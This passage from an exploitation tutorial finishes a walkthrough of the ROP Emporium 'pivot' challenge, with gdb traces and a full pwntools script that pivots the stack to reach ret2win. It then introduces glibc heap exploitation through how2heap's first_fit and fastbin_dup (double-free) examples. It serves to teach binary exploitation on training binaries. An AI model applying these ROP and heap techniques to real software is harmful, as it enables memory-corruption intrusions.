=> 0x804889f <pwnme+173>: leave
0x80488a0 <pwnme+174>: ret
0x80488a1 <uselessFunction>: push ebp
0x80488a2 <uselessFunction+1>: mov ebp,esp
0x80488a4 <uselessFunction+3>: sub esp,0x8
[------------------------------------stack-------------------------------------]
0000| 0xffe7ec70 --> 0xf755000a --> 0x0
0004| 0xffe7ec74 --> 0x0
0008| 0xffe7ec78 --> 0x2
0012| 0xffe7ec7c --> 0x0
0016| 0xffe7ec80 --> 0x1
0020| 0xffe7ec84 --> 0xffe7ed44 --> 0xffe808cf ("./pivot32")
0024| 0xffe7ec88 --> 0xf755cf10 --> 0x80485f0 (<foothold_function@plt>: jmp DWORD PTR ds:0x804a024)
0028| 0xffe7ec8c --> 0xf655d010 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x0804889f in pwnme ()
EIP=0x804889f, and ESP is increased by 4.
The second leave:
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EBX: 0x0
ECX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EDX: 0xf7731860 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0x0
ESP: 0xf755cf10 --> 0x80485f0 (<foothold_function@plt>: jmp DWORD PTR ds:0x804a024)
EIP: 0x80488a0 (<pwnme+174>: ret)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x804889b <pwnme+169>: add esp,0x10
0x804889e <pwnme+172>: nop
0x804889f <pwnme+173>: leave
=> 0x80488a0 <pwnme+174>: ret
0x80488a1 <uselessFunction>: push ebp
0x80488a2 <uselessFunction+1>: mov ebp,esp
0x80488a4 <uselessFunction+3>: sub esp,0x8
0x80488a7 <uselessFunction+6>: call 0x80485f0 <foothold_function@plt>
[------------------------------------stack-------------------------------------]
0000| 0xf755cf10 --> 0x80485f0 (<foothold_function@plt>: jmp DWORD PTR ds:0x804a024)
0004| 0xf755cf14 --> 0x80488c0 (<usefulGadgets>: pop eax)
0008| 0xf755cf18 --> 0x804a024 --> 0x80485f6 (<foothold_function@plt+6>: push 0x30)
0012| 0xf755cf1c --> 0x80488c4 (<usefulGadgets+4>: mov eax,DWORD PTR [eax])
0016| 0xf755cf20 --> 0x8048571 (<_init+33>: pop ebx)
0020| 0xf755cf24 --> 0x1f7
0024| 0xf755cf28 --> 0x80488c7 (<usefulGadgets+7>: add eax,ebx)
0028| 0xf755cf2c --> 0x80486a3 (<deregister_tm_clones+35>: call eax)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080488a0 in pwnme ()
gdb-peda$ x/10w 0xf755cf10
0xf755cf10: 0x080485f0 0x080488c0 0x0804a024 0x080488c4
0xf755cf20: 0x08048571 0x000001f7 0x080488c7 0x080486a3
0xf755cf30: 0x0000000a 0x00000000
The value of EBP, 0xf755cf0c, is assigned to ESP, the main payload's ebp is popped into EBP, and ESP+4=0xf755cf10, which is exactly the address of our main payload.
The second ret:
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EBX: 0x0
ECX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EDX: 0xf7731860 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0x0
ESP: 0xf755cf14 --> 0x80488c0 (<usefulGadgets>: pop eax)
EIP: 0x80485f0 (<foothold_function@plt>: jmp DWORD PTR ds:0x804a024)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x80485e0 <exit@plt>: jmp DWORD PTR ds:0x804a020
0x80485e6 <exit@plt+6>: push 0x28
0x80485eb <exit@plt+11>: jmp 0x8048580
=> 0x80485f0 <foothold_function@plt>: jmp DWORD PTR ds:0x804a024
| 0x80485f6 <foothold_function@plt+6>: push 0x30
| 0x80485fb <foothold_function@plt+11>: jmp 0x8048580
| 0x8048600 <__libc_start_main@plt>: jmp DWORD PTR ds:0x804a028
| 0x8048606 <__libc_start_main@plt+6>: push 0x38
|-> 0x80485f6 <foothold_function@plt+6>: push 0x30
0x80485fb <foothold_function@plt+11>: jmp 0x8048580
0x8048600 <__libc_start_main@plt>: jmp DWORD PTR ds:0x804a028
0x8048606 <__libc_start_main@plt+6>: push 0x38
JUMP is taken
[------------------------------------stack-------------------------------------]
0000| 0xf755cf14 --> 0x80488c0 (<usefulGadgets>: pop eax)
0004| 0xf755cf18 --> 0x804a024 --> 0x80485f6 (<foothold_function@plt+6>: push 0x30)
0008| 0xf755cf1c --> 0x80488c4 (<usefulGadgets+4>: mov eax,DWORD PTR [eax])
0012| 0xf755cf20 --> 0x8048571 (<_init+33>: pop ebx)
0016| 0xf755cf24 --> 0x1f7
0020| 0xf755cf28 --> 0x80488c7 (<usefulGadgets+7>: add eax,ebx)
0024| 0xf755cf2c --> 0x80486a3 (<deregister_tm_clones+35>: call eax)
0028| 0xf755cf30 --> 0xa ('\n')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080485f0 in foothold_function@plt ()
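We have successfully jumped to foothold_function@plt. Next, the dynamic linker goes through _dl_runtime_resolve and related steps and writes the real address into .got.plt. We then use gadgets to read that address out, compute the address of ret2win() from it, and call it, which completes the exploit.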
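The arithmetic performed by the gadget chain can be traced with a short Python sketch. The values are the ones visible in the debugger output of this section (GOT slot 0x804a024, resolved address 0xf7772770, offset 0x1f7); the dictionary standing in for process memory and the name `run_chain` are illustrative assumptions and not part of the exploit itself.

```python
# Toy trace of the 32-bit chain:
#   pop eax ; mov eax,[eax] ; pop ebx ; add eax,ebx ; call eax
MASK32 = 0xFFFFFFFF

def run_chain(memory, got_slot, offset):
    """Return the address that `call eax` would jump to."""
    eax = got_slot              # pop eax        -> address of the .got.plt slot
    eax = memory[eax]           # mov eax,[eax]  -> resolved foothold_function
    ebx = offset                # pop ebx        -> ret2win - foothold_function
    eax = (eax + ebx) & MASK32  # add eax,ebx    -> address of ret2win
    return eax                  # call eax

# State after lazy binding has filled in the GOT entry.
memory = {0x804A024: 0xF7772770}
target = run_chain(memory, 0x804A024, 0x1F7)
print(hex(target))
```

The chain only works after foothold_function has been called once, because before that the GOT slot still holds the address of foothold_function@plt+6 rather than the library address.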
The address leak, step by step:
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0x54 ('T')
EBX: 0x0
ECX: 0x54 ('T')
EDX: 0xf7731854 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0x0
ESP: 0xf755cf18 --> 0x804a024 --> 0xf7772770 (<foothold_function>: push ebp)
EIP: 0x80488c0 (<usefulGadgets>: pop eax)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x80488ba: xchg ax,ax
0x80488bc: xchg ax,ax
0x80488be: xchg ax,ax
=> 0x80488c0 <usefulGadgets>: pop eax
0x80488c1 <usefulGadgets+1>: ret
0x80488c2 <usefulGadgets+2>: xchg esp,eax
0x80488c3 <usefulGadgets+3>: ret
0x80488c4 <usefulGadgets+4>: mov eax,DWORD PTR [eax]
[------------------------------------stack-------------------------------------]
0000| 0xf755cf18 --> 0x804a024 --> 0xf7772770 (<foothold_function>: push ebp)
0004| 0xf755cf1c --> 0x80488c4 (<usefulGadgets+4>: mov eax,DWORD PTR [eax])
0008| 0xf755cf20 --> 0x8048571 (<_init+33>: pop ebx)
0012| 0xf755cf24 --> 0x1f7
0016| 0xf755cf28 --> 0x80488c7 (<usefulGadgets+7>: add eax,ebx)
0020| 0xf755cf2c --> 0x80486a3 (<deregister_tm_clones+35>: call eax)
0024| 0xf755cf30 --> 0xa ('\n')
0028| 0xf755cf34 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080488c0 in usefulGadgets ()
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0x804a024 --> 0xf7772770 (<foothold_function>: push ebp)
EBX: 0x0
ECX: 0x54 ('T')
EDX: 0xf7731854 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0x0
ESP: 0xf755cf1c --> 0x80488c4 (<usefulGadgets+4>: mov eax,DWORD PTR [eax])
EIP: 0x80488c1 (<usefulGadgets+1>: ret)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x80488bc: xchg ax,ax
0x80488be: xchg ax,ax
0x80488c0 <usefulGadgets>: pop eax
=> 0x80488c1 <usefulGadgets+1>: ret
0x80488c2 <usefulGadgets+2>: xchg esp,eax
0x80488c3 <usefulGadgets+3>: ret
0x80488c4 <usefulGadgets+4>: mov eax,DWORD PTR [eax]
0x80488c6 <usefulGadgets+6>: ret
[------------------------------------stack-------------------------------------]
0000| 0xf755cf1c --> 0x80488c4 (<usefulGadgets+4>: mov eax,DWORD PTR [eax])
0004| 0xf755cf20 --> 0x8048571 (<_init+33>: pop ebx)
0008| 0xf755cf24 --> 0x1f7
0012| 0xf755cf28 --> 0x80488c7 (<usefulGadgets+7>: add eax,ebx)
0016| 0xf755cf2c --> 0x80486a3 (<deregister_tm_clones+35>: call eax)
0020| 0xf755cf30 --> 0xa ('\n')
0024| 0xf755cf34 --> 0x0
0028| 0xf755cf38 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080488c1 in usefulGadgets ()
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0x804a024 --> 0xf7772770 (<foothold_function>: push ebp)
EBX: 0x0
ECX: 0x54 ('T')
EDX: 0xf7731854 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0x0
ESP: 0xf755cf20 --> 0x8048571 (<_init+33>: pop ebx)
EIP: 0x80488c4 (<usefulGadgets+4>: mov eax,DWORD PTR [eax])
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x80488c1 <usefulGadgets+1>: ret
0x80488c2 <usefulGadgets+2>: xchg esp,eax
0x80488c3 <usefulGadgets+3>: ret
=> 0x80488c4 <usefulGadgets+4>: mov eax,DWORD PTR [eax]
0x80488c6 <usefulGadgets+6>: ret
0x80488c7 <usefulGadgets+7>: add eax,ebx
0x80488c9 <usefulGadgets+9>: ret
0x80488ca <usefulGadgets+10>: xchg ax,ax
[------------------------------------stack-------------------------------------]
0000| 0xf755cf20 --> 0x8048571 (<_init+33>: pop ebx)
0004| 0xf755cf24 --> 0x1f7
0008| 0xf755cf28 --> 0x80488c7 (<usefulGadgets+7>: add eax,ebx)
0012| 0xf755cf2c --> 0x80486a3 (<deregister_tm_clones+35>: call eax)
0016| 0xf755cf30 --> 0xa ('\n')
0020| 0xf755cf34 --> 0x0
0024| 0xf755cf38 --> 0x0
0028| 0xf755cf3c --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080488c4 in usefulGadgets ()
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xf7772770 (<foothold_function>: push ebp)
EBX: 0x0
ECX: 0x54 ('T')
EDX: 0xf7731854 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0x0
ESP: 0xf755cf20 --> 0x8048571 (<_init+33>: pop ebx)
EIP: 0x80488c6 (<usefulGadgets+6>: ret)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x80488c2 <usefulGadgets+2>: xchg esp,eax
0x80488c3 <usefulGadgets+3>: ret
0x80488c4 <usefulGadgets+4>: mov eax,DWORD PTR [eax]
=> 0x80488c6 <usefulGadgets+6>: ret
0x80488c7 <usefulGadgets+7>: add eax,ebx
0x80488c9 <usefulGadgets+9>: ret
0x80488ca <usefulGadgets+10>: xchg ax,ax
0x80488cc <usefulGadgets+12>: xchg ax,ax
[------------------------------------stack-------------------------------------]
0000| 0xf755cf20 --> 0x8048571 (<_init+33>: pop ebx)
0004| 0xf755cf24 --> 0x1f7
0008| 0xf755cf28 --> 0x80488c7 (<usefulGadgets+7>: add eax,ebx)
0012| 0xf755cf2c --> 0x80486a3 (<deregister_tm_clones+35>: call eax)
0016| 0xf755cf30 --> 0xa ('\n')
0020| 0xf755cf34 --> 0x0
0024| 0xf755cf38 --> 0x0
0028| 0xf755cf3c --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080488c6 in usefulGadgets ()
pivot
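This is basically the same as above, but you can try implementing the part that modifies rsp with gadgets as well. The advantage is that we do not have to forge a stack frame, i.e. we no longer need to care about the saved ebp (rbp on this 64-bit target). For example:
payload_2 = b"A" * 40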
payload_2 += p64(pop_rax)
payload_2 += p64(leakaddr)
payload_2 += p64(xchg_rax_rsp)
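To see why these three entries are enough, the pivot can be modeled in a few lines of Python. This is a toy sketch under stated assumptions: memory is a dictionary, gadgets are represented by names instead of real addresses, and `LEAK` and `STACK` are made-up addresses standing in for leakaddr and the overwritten return slot.

```python
# Toy model of a stack pivot built from `pop rax ; ret` and `xchg rax, rsp ; ret`.
LEAK = 0x7F0000001000    # hypothetical address of the pivot buffer (leakaddr)
STACK = 0x7FFF00000000   # hypothetical address of the overwritten return slot

def run(memory, rsp):
    """Execute gadget names found on the stack until 'stop'; return a trace."""
    rax, trace = 0, []
    while True:
        gadget = memory[rsp]      # `ret` pops the next gadget address
        rsp += 8
        if gadget == "stop":
            return trace
        if gadget == "pop_rax":
            rax = memory[rsp]     # pop rax
            rsp += 8
        elif gadget == "xchg_rax_rsp":
            rax, rsp = rsp, rax   # rsp now points into the pivot buffer
        trace.append((gadget, rsp))

memory = {
    # payload_2, placed where the saved return address used to be
    STACK: "pop_rax", STACK + 8: LEAK, STACK + 16: "xchg_rax_rsp",
    # payload_1 would start here; "stop" stands in for its first gadget
    LEAK: "stop",
}
trace = run(memory, STACK)
print([(name, hex(sp)) for name, sp in trace])
```

After the `xchg` step the model's rsp equals `LEAK`, so the next `ret` fetches its target from the buffer that holds the first payload.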
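In fact, this is the approach I used myself. While building the payload I found that the address of the leave; ret gadget (0x0000000000400ae0 <+165>: leave) contains the truncating byte 0a, so it cannot be written into the buffer in the normal way. This can be worked around: first replace 0a with a non-truncating byte, then use registers to write 0a back to that location, which is the usual way of dealing with truncating bytes in a buffer. It is considerably harder, though, so I do not recommend it; interested readers are welcome to try.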
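A quick way to spot such addresses before building a payload is to pack each one and look for the offending byte. The sketch below uses only the standard library; the gadget addresses are the ones from the script in this section, while the helper name `has_bad_byte` and the assumption that only the newline byte 0x0a truncates the input are mine.

```python
import struct

def has_bad_byte(addr, bad=b"\n"):
    """True if the little-endian 64-bit encoding of addr contains a bad byte."""
    packed = struct.pack("<Q", addr)
    return any(byte in packed for byte in bad)

gadgets = {
    "leave_ret": 0x400ADF,
    "pop_rax": 0x400B00,
    "pop_rbp": 0x400900,
    "mov_rax_rax": 0x400B05,
    "xchg_rax_rsp": 0x400B02,
    "add_rax_rbp": 0x400B09,
    "call_rax": 0x40098E,
}

# Names of gadgets whose packed address would be cut off by the input routine.
unusable = sorted(name for name, addr in gadgets.items() if has_bad_byte(addr))
print(unusable)
```

Only the leave; ret address is flagged, which is consistent with switching to the `xchg rax, rsp` gadget for the pivot.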
$ ropgadget --binary pivot --only "mov|pop|call|add|xchg|ret"
0x0000000000400b09 : add rax, rbp ; ret
0x000000000040098e : call rax
0x0000000000400b05 : mov rax, qword ptr [rax] ; ret
0x0000000000400b00 : pop rax ; ret
0x0000000000400900 : pop rbp ; ret
0x0000000000400b02 : xchg rax, rsp ; ret
from pwn import *
#context.log_level = 'debug'
#context.terminal = ['konsole']
io = process('./pivot')
elf = ELF('./pivot')
libp = ELF('./libpivot.so')
leave_ret = 0x0000000000400adf
foothold_plt = elf.plt['foothold_function'] # 0x400850
foothold_got_plt = elf.got['foothold_function'] # 0x602048
pop_rax = 0x0000000000400b00
pop_rbp = 0x0000000000400900
mov_rax_rax = 0x0000000000400b05
xchg_rax_rsp = 0x0000000000400b02
add_rax_rbp = 0x0000000000400b09
call_rax = 0x000000000040098e
foothold_sym = libp.symbols['foothold_function']
ret2win_sym = libp.symbols['ret2win']
offset = int(ret2win_sym - foothold_sym) # 0x14e
leakaddr = int(io.recv().split()[20], 16)
# call foothold_function() to populate its GOT entry, then load that value into RAX
#gdb.attach(io)
payload_1 = p64(foothold_plt)
payload_1 += p64(pop_rax)
payload_1 += p64(foothold_got_plt)
payload_1 += p64(mov_rax_rax)
payload_1 += p64(pop_rbp)
payload_1 += p64(offset)
payload_1 += p64(add_rax_rbp)
payload_1 += p64(call_rax)
io.sendline(payload_1)
# rsp = leakaddr
payload_2 = b"A" * 40
payload_2 += p64(pop_rax)
payload_2 += p64(leakaddr)
payload_2 += p64(xchg_rax_rsp)
io.sendline(payload_2)
print(io.recvall())
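That concludes the introduction to basic ROP. More advanced uses are covered in later chapters; "advanced" simply means that the gadgets are chained more cleverly and the operating-system knowledge involved is lower level.
3.1.6 Linux Heap Exploitation (Part 1)
Introduction to the Linux Heap
The heap is a contiguous region of a program's virtual address space that grows from low addresses toward high addresses. The heap allocator currently used on Linux is called ptmalloc2 and is implemented in glibc.
We covered it in more detail in section 1.5.8, and section 1.5.7 has related material; please review both.
Heap exploitation differs from a stack overflow, which can overwrite a function's return address directly and thereby control EIP. On the heap, the program's control flow can only be hijacked through indirect means.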
how2heap
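how2heap is a heap exploitation tutorial made by the shellphish team that introduces a variety of heap exploitation techniques; in this article we learn through it. A 64-bit Ubuntu 16.04 environment is recommended, with the following glibc version: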
$ file /lib/x86_64-linux-gnu/libc-2.23.so
/lib/x86_64-linux-gnu/libc-2.23.so: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=088a6e00a1814622219f346b41e775b8dd46c518, for GNU/Linux 2.6.32, stripped
$ git clone https://github.com/shellphish/how2heap.git
$ cd how2heap
$ make
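Note that the code shown below has been simplified: I removed or changed some unnecessary comments and code to make it easier to study. Also, as explained in section 4.3, adding the compiler option CFLAGS += -fsanitize=address enables detection of memory errors.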
first_fit
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main() {
char* a = malloc(512);
char* b = malloc(256);
char* c;
fprintf(stderr, "1st malloc(512): %p\n", a);
fprintf(stderr, "2nd malloc(256): %p\n", b);
strcpy(a, "AAAAAAAA");
strcpy(b, "BBBBBBBB");
fprintf(stderr, "first allocation %p points to %s\n", a, a);
fprintf(stderr, "Freeing the first one...\n");
free(a);
c = malloc(500);
fprintf(stderr, "3rd malloc(500): %p\n", c);
strcpy(c, "CCCCCCCC");
fprintf(stderr, "3rd allocation %p points to %s\n", c, c);
fprintf(stderr, "first allocation %p points to %s\n", a, a);
}
$ gcc -g first_fit.c
$ ./a.out
1st malloc(512): 0x1380010
2nd malloc(256): 0x1380220
first allocation 0x1380010 points to AAAAAAAA
Freeing the first one...
3rd malloc(500): 0x1380010
3rd allocation 0x1380010 points to CCCCCCCC
first allocation 0x1380010 points to CCCCCCCC
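This first program demonstrates glibc's heap allocation strategy, first-fit. When allocating memory, malloc first looks in the unsorted bin (or the fastbins) for a suitable freed chunk. If none is found, it sorts every chunk in the unsorted bin into the bin it belongs to and then searches those bins for a suitable chunk. As the output shows, the third malloc returns the same address as the first: malloc found the chunk that had been freed and handed it out again.
Debugging in gdb, after the two mallocs (a chunk starts 0x10 below the address returned by malloc):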
gef➤ x/5gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000211 <-- chunk a
0x602010: 0x4141414141414141 0x0000000000000000
0x602020: 0x0000000000000000
gef➤ x/5gx 0x602220-0x10
0x602210: 0x0000000000000000 0x0000000000000111 <-- chunk b
0x602220: 0x4242424242424242 0x0000000000000000
0x602230: 0x0000000000000000
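The size fields in these dumps (0x211 and 0x111) follow from how glibc rounds a request up to a chunk size. The sketch below mirrors my reading of the request2size macro in glibc 2.23 for x86-64; the Python constant and function names are chosen to match the C names but are otherwise just an illustration.

```python
SIZE_SZ = 8                          # sizeof(size_t) on x86-64
MALLOC_ALIGN_MASK = 2 * SIZE_SZ - 1  # chunks are 16-byte aligned
MINSIZE = 4 * SIZE_SZ                # smallest possible chunk (0x20)
PREV_INUSE = 0x1                     # low bit of the size field

def request2size(req):
    """Chunk size used for a malloc(req) request, header included."""
    size = (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK
    return max(size, MINSIZE)

for req in (512, 256, 500, 9):
    size = request2size(req)
    print("malloc(%d) -> chunk size %#x, size field %#x"
          % (req, size, size | PREV_INUSE))
```

A request of 500 bytes needs a 0x200-byte chunk, which is only 0x10 bytes smaller than the 0x210-byte chunk created for malloc(512).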
After the first free, the chunk is added to the unsorted bin:
gef➤ x/5gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000211 <-- chunk a [freed]
0x602010: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd pointer, bk pointer
0x602020: 0x0000000000000000
gef➤ x/5gx 0x602220-0x10
0x602210: 0x0000000000000210 0x0000000000000110 <-- chunk b
0x602220: 0x4242424242424242 0x0000000000000000
0x602230: 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602000, bk=0x602000
→ Chunk(addr=0x602010, size=0x210, flags=PREV_INUSE)
[+] Found 1 chunks in unsorted bin.
After the third malloc:
gef➤ x/5gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000211 <-- chunk c
0x602010: 0x4343434343434343 0x00007ffff7dd1d00
0x602020: 0x0000000000000000
gef➤ x/5gx 0x602220-0x10
0x602210: 0x0000000000000210 0x0000000000000111 <-- chunk b
0x602220: 0x4242424242424242 0x0000000000000000
0x602230: 0x0000000000000000
So when a block of memory is freed and a slightly smaller block is then requested, glibc tends to hand the previously freed space back out.
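The reuse can be reproduced with a deliberately simplified allocator model. This is a toy, not glibc: it keeps one free list, takes the first chunk that is large enough, and splits it only when the remainder would be at least MINSIZE. The class name `ToyHeap` is hypothetical, and the sizes passed in are chunk sizes (0x210, 0x110, 0x200) rather than request sizes.

```python
MINSIZE = 0x20   # a remainder smaller than this cannot form a chunk
HEADER = 0x10    # prev_size + size fields in front of the user data

class ToyHeap:
    def __init__(self, base=0x602000):
        self.top = base
        self.free_chunks = []   # (chunk_addr, chunk_size), oldest first
        self.sizes = {}         # chunk_addr -> size of allocated chunks

    def malloc(self, chunk_size):
        for i, (addr, size) in enumerate(self.free_chunks):
            if size >= chunk_size:              # first fit
                del self.free_chunks[i]
                if size - chunk_size >= MINSIZE:
                    # split and keep the remainder on the free list
                    rest = (addr + chunk_size, size - chunk_size)
                    self.free_chunks.insert(i, rest)
                    size = chunk_size
                self.sizes[addr] = size
                return addr + HEADER
        addr = self.top                         # nothing fits: extend the top
        self.top += chunk_size
        self.sizes[addr] = chunk_size
        return addr + HEADER

    def free(self, ptr):
        addr = ptr - HEADER
        self.free_chunks.append((addr, self.sizes.pop(addr)))

heap = ToyHeap()
a = heap.malloc(0x210)   # malloc(512)
b = heap.malloc(0x110)   # malloc(256)
heap.free(a)
c = heap.malloc(0x200)   # malloc(500)
print(hex(a), hex(b), hex(c), hex(heap.sizes[c - HEADER]))
```

In the model, `c` comes back at the same address as `a` and keeps the full 0x210 bytes, because the 0x10-byte remainder is too small to split off.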
Now let's recompile with the memory-checking option:
$ gcc -fsanitize=address -g first_fit.c
$ ./a.out
1st malloc(512): 0x61500000fd00
2nd malloc(256): 0x611000009f00
first allocation 0x61500000fd00 points to AAAAAAAA
Freeing the first one...
3rd malloc(500): 0x61500000fa80
3rd allocation 0x61500000fa80 points to CCCCCCCC
=================================================================
==4525==ERROR: AddressSanitizer: heap-use-after-free on address 0x61500000fd00 at pc 0x7f49d14a61e9 bp 0x7ffe40b526e0 sp 0x7ffe40b51e58
READ of size 2 at 0x61500000fd00 thread T0
#0 0x7f49d14a61e8 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x601e8)
#1 0x7f49d14a6bcc in vfprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x60bcc)
#2 0x7f49d14a6cf9 in fprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x60cf9)
#3 0x400b8b in main /home/firmy/how2heap/first_fit.c:23
#4 0x7f49d109c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#5 0x400878 in _start (/home/firmy/how2heap/a.out+0x400878)
0x61500000fd00 is located 0 bytes inside of 512-byte region [0x61500000fd00,0x61500000ff00)
freed by thread T0 here:
#0 0x7f49d14de2ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
#1 0x400aa2 in main /home/firmy/how2heap/first_fit.c:17
#2 0x7f49d109c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
previously allocated by thread T0 here:
#0 0x7f49d14de602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x400957 in main /home/firmy/how2heap/first_fit.c:6
#2 0x7f49d109c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
This is an obvious use-after-free bug. How this class of bug is exploited in detail is covered in later chapters.
fastbin_dup
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main() {
fprintf(stderr, "Allocating 3 buffers.\n");
char *a = malloc(9);
char *b = malloc(9);
char *c = malloc(9);
strcpy(a, "AAAAAAAA");
strcpy(b, "BBBBBBBB");
strcpy(c, "CCCCCCCC");
fprintf(stderr, "1st malloc(9) %p points to %s\n", a, a);
fprintf(stderr, "2nd malloc(9) %p points to %s\n", b, b);
fprintf(stderr, "3rd malloc(9) %p points to %s\n", c, c);
fprintf(stderr, "Freeing the first one %p.\n", a);
free(a);
fprintf(stderr, "Then freeing another one %p.\n", b);
free(b);
fprintf(stderr, "Freeing the first one %p again.\n", a);
free(a);
fprintf(stderr, "Allocating 3 buffers.\n");
char *d = malloc(9);
char *e = malloc(9);
char *f = malloc(9);
strcpy(d, "DDDDDDDD");
fprintf(stderr, "4st malloc(9) %p points to %s the first time\n", d, d);
strcpy(e, "EEEEEEEE");
fprintf(stderr, "5nd malloc(9) %p points to %s\n", e, e);
strcpy(f, "FFFFFFFF");
fprintf(stderr, "6rd malloc(9) %p points to %s the second time\n", f, f);
}
$ gcc -g fastbin_dup.c
$ ./a.out
Allocating 3 buffers.
1st malloc(9) 0x1c07010 points to AAAAAAAA
2nd malloc(9) 0x1c07030 points to BBBBBBBB
3rd malloc(9) 0x1c07050 points to CCCCCCCC
Freeing the first one 0x1c07010.
Then freeing another one 0x1c07030.
Freeing the first one 0x1c07010 again.
Allocating 3 buffers.
4st malloc(9) 0x1c07010 points to DDDDDDDD the first time
5nd malloc(9) 0x1c07030 points to EEEEEEEE
6rd malloc(9) 0x1c07010 points to FFFFFFFF the second time
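This program demonstrates the double-free attack on fastbins, which can leak a pointer to a block of memory that is already allocated. The fastbins can be viewed as LIFO stacks implemented as singly linked lists and traversed through fastbin->fd. Because free checks the free list, we cannot free the same chunk twice in a row, so a free of another chunk is inserted between the two frees to bypass the check. Calling malloc three more times then returns the same address twice, which gives us two pointers to the same memory region.
The double-free check in libc-2.23 looks like this: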
/* Check that the top of the bin is not the record we are going to add
(i.e., double free). */
if (__builtin_expect (old == p, 0))
{
errstr = "double free or corruption (fasttop)";
goto errout;
}
When checking for a double-free in a fast bin, it only looks at the first chunk, so the check is flawed.
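The weakness of a check that only compares against the top of the bin can be shown with a small model. The class below is a toy LIFO list with that single comparison; `ToyFastbin` and `DoubleFree` are illustrative names, and chunks are represented by plain strings.

```python
class DoubleFree(Exception):
    pass

class ToyFastbin:
    """LIFO singly linked list with only the 'fasttop' comparison."""

    def __init__(self):
        self.head = None   # chunk at the top of the bin
        self.fd = {}       # chunk -> next chunk in the list

    def free(self, chunk):
        if chunk == self.head:
            raise DoubleFree("double free or corruption (fasttop)")
        self.fd[chunk] = self.head   # link in front of the old top
        self.head = chunk

    def malloc(self):
        chunk = self.head
        if chunk is None:
            raise MemoryError("bin is empty")
        self.head = self.fd[chunk]   # follow fd to the next chunk
        return chunk

bin0 = ToyFastbin()
bin0.free("a")
bin0.free("b")
bin0.free("a")           # accepted: the top of the bin is "b", not "a"
d, e, f = bin0.malloc(), bin0.malloc(), bin0.malloc()
print(d, e, f)
```

Freeing "a" twice in a row would raise `DoubleFree`, while the a, b, a sequence passes and hands "a" out twice.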
After the three mallocs:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk a
0x602010: 0x4141414141414141 0x0000000000000000
0x602020: 0x0000000000000000 0x0000000000000021 <-- chunk b
0x602030: 0x4242424242424242 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000021 <-- chunk c
0x602050: 0x4343434343434343 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000020fa1 <-- top chunk
0x602070: 0x0000000000000000
After the first free, chunk a is added to the fastbins:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk a [freed]
0x602010: 0x0000000000000000 0x0000000000000000 <-- fd pointer
0x602020: 0x0000000000000000 0x0000000000000021 <-- chunk b
0x602030: 0x4242424242424242 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000021 <-- chunk c
0x602050: 0x4343434343434343 0x0000000000000000
